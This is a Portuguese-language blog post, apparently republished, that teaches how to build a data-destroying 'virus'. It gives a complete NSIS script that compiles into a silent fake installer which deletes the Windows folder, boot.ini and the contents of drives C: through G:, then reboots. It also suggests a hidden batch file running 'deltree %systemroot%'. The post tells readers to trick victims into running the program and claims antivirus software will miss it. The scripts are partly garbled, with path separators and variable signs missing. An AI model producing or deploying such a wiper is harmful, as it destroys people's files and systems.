pensei muito sobre esta mensagem encontrada no Explorando afinal colocar como se produz um virús, poderia tirar a idéia inicial deste site. mas lá vai mesmo assim.

Como criar um vírus?

Pra que você quer saber como criar um vírus? Bem… A responsabilidade é sua, blz? Nesta dica você terá uma aulinha prática de como criar um vírus que detona TUDO do HD.

e que fique claro é de sua inteira responsabilidade.

Um vírus é um programa do mal, que faz mal ao sistema operacional, a outros programas ou a arquivos do computador. Podem ser ainda de outros tipos, mas estes são os mais comuns. Basicamente, um vírus é um programa. Um programa com instruções que poderiam ser usadas para o bem, mas aplicadas para o mal. Portanto, para fazer um vírus, aprenda a fazer programas. Existem, no entanto, meios mais simples que permitem a criação de vírus usando determinadas estratégias, ferramentas e recursos já existentes. Além de saber fazer o vírus, você deve saber o que ele fará. O vírus ataca alguma coisa. Você deve conhecer essa coisa, seus pontos fracos e fortes, verificar caminhos por onde entrar. E como rodá-lo? O meio mais simples é convencer os usuários a executar o arquivo do vírus nos seus computadores.

Um vírus não precisa ser necessariamente um programa. Você deve estudar e conhecer o que quer atacar, e usar meios para isso. Por exemplo, apagar arquivos. Criar um “.bat” com o comando “deltree %systemroot%” adaptado para não mostrar nada, por exemplo. Esse arquivo pode ser considerado um vírus, embora é um simples arquivo ASCII, de texto puro. O interpretador de comandos é que vai executar as ações, de acordo com o que estiver indicado.

Apagar arquivos… use o gerador de programas de instalação NSIS (Nullsoft Scriptable Install System). Ele é destinado a desenvolvedores e distribuidores de aplicações, mas é muito versátil. Você cria um “falso” programa de instalação, que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com as instruções, compila nele, e ele gera o executável baseado nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb. Mas você poderia usar, é claro, outros instaladores…

Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em verde:

!define PRODUCT_NAME “APAGADOR_XXX”!define PRODUCT_VERSION “1.0″!define PRODUCT_PUBLISHER “HACKER_XXX”

SetCompressor lzma

Name “{PRODUCT_NAME} {PRODUCT_VERSION}”OutFile “MeuVirus.exe”InstallDir “TEMP”Icon “{NSISDIR}ContribGraphicsIconsmodern-install.ico”SilentInstall silent

Section “Sec001″ SEC01Delete /REBOOTOK “WINDIR.”SectionEnd

Section -PostRebootSectionEnd

Salve com a extensão “.nsi”, e escolha “Todos os arquivos”, no campo “Salvar como tipo”. A extensão “.nsi” é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS (”Iniciar > Programas > MakeNSISW (Compiler GUI)”).

Vamos entender esse arquivo… As três primeiras linhas identificam o “programa” que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item “OutFile” é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha “SilentInstall silent” gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.

Na seção “Sec01″, você deve adicionar as entradas “Delete” que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.

A linha “Delete /REBOOTOK “WINDIR.” apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:

Delete /REBOOTOK “C:boot.ini“Delete /REBOOTOK “C:Meus documentos.”Delete /REBOOTOK “C:.”Delete /REBOOTOK “D:.”Delete /REBOOTOK “E:.”Delete /REBOOTOK “F:.”Delete /REBOOTOK “G:.”Delete /REBOOTOK “C:Arquivos de programas.”

Adicione o que quiser, arquivos específicos, etc.

A última seção, “Section -Post / Reboot / SectionEnd”, será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando “reboot” reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.

Salve o arquivo. Abra o compilador do NSIS, em “Iniciar > Programas > MakeNSISW (Compiler GUI)”, clique no menu “File > Load script”, localize o arquivo de extensão “.nsi” que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO “TEST INSTALLER”.

O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.

Como testá-lo sem se ferrar por conta da própria criação? Use máquinas virtuais! Já comentei aqui no Explorando sobre o Bochs, na seção de matérias do site Mep Sites (materias.mepsites.cjb.net) você encontra um tutorial dele. Pode usar também o QEMU, com a ajuda do Kemula (kemula.mepsites.cjb.net), se precisar. Ou o comercial e carinho VMware. Usando uma máquina virtual você ferra apenas o sistema virtual, que pode ser facilmente restaurado se você tiver uma cópia dele em CD ou outra pasta. Dica: use máquinas virtuais também para testar pela primeira vez programas que você pega na Internet, e mais: navegue na Internet só pela máquina virtual! Quanto ao seu “virusinho”, se preferir, teste num PC cobaia, onde você saiba que tudo pode ser apagado. Leia a ajuda do NSIS para ver outros comandos e constantes de pastas.

Fácil, não?

Claro, isso é só um exemplo, ideal para lammers ou gente que se acha (e que na real não sabe é nada). Ou mesmo para quem está curioso e iniciando. Para fazer vírus específicos é recomendável dominar uma linguagem de programação. E lembre-se: você deve saber o que o vírus fará, o que ele vai atacar, e mais, saber como atacar. Não adianta querer ver a agenda do celular da namorada se você não souber onde ela guarda o celular. Não adianta querer ferrar um programa se você não souber que arquivos ou chaves do registro ele utiliza.